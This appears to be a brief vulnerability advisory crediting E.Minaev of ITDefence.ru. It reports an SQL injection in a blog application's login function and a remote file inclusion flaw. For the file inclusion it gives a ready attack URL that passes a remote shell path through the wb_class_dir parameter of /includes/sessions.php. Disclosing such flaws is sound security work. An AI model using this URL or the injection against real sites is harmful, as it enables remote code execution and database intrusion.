Found by E.Minaev ([email protected])
ITDefence.ru
1) SQL Injection in login function. With help of this injection is possible to make per-symbol brute of tables names of
blog's database (magic_quotes_gpc should be tured off).
2) Remote File Inclusion (RFI)
/includes/sessions.php?wb_class_dir=shell?